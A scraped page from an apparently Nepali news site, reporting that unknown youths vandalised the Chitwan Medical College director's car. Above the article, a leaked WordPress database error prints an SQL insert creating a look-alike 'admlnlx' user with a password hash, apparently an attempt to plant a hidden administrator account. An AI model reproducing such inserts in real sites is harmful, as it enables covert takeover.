WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BP6ZvLOV5KyGZIyrks/TigW/kHaoMu.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:53:52', '', 'admlnlx', 'admlnlx')
चितवन, माघ ११–
चितवन मेडिकल कलेजका प्रवन्ध निर्देशक डा.हरिषचन्द्र न्यौपाने सवार कार अज्ञात व्यक्तिले तोडफोड गरेका छन् ।
आज अपरान्ह चितवन मेडिकल कलेज अगाडि बा १४ च ७५६४ नम्बरको कार पार्किङ गरिरहेको अवस्थामा मोटरसाईकलमा आएका केही युवाहरुले तोडफोड गरि भागेको चितवन प्रहरीले जनाएको छ । उनीहरुको अहिले खोजीकार्य भईरहेको प्रहरीले जनाएको छ ।
चितवन मेडिकल कलेजका प्रवन्धक निर्देशक डा. न्यौपानेले आफू कार्यलयमा रहेको बेला अपरान्ह करिव साँढे ४ बजेको समयमा कार तोडफाड भएको नारायणी अनलाईनलाई जानकारी दिनुभयो । उहाँले तोडफोड गर्ने व्यक्ति पहिचान नभएको बताउनुभयो । तोडफोडबाट कारको सिसा फुटेको छ । अज्ञात व्यक्तिले क्रिकेट खेल्ने स्टम्पले सिसा फुटाएका थिए ।
तस्विर सौजन्यः इश्वर जोशी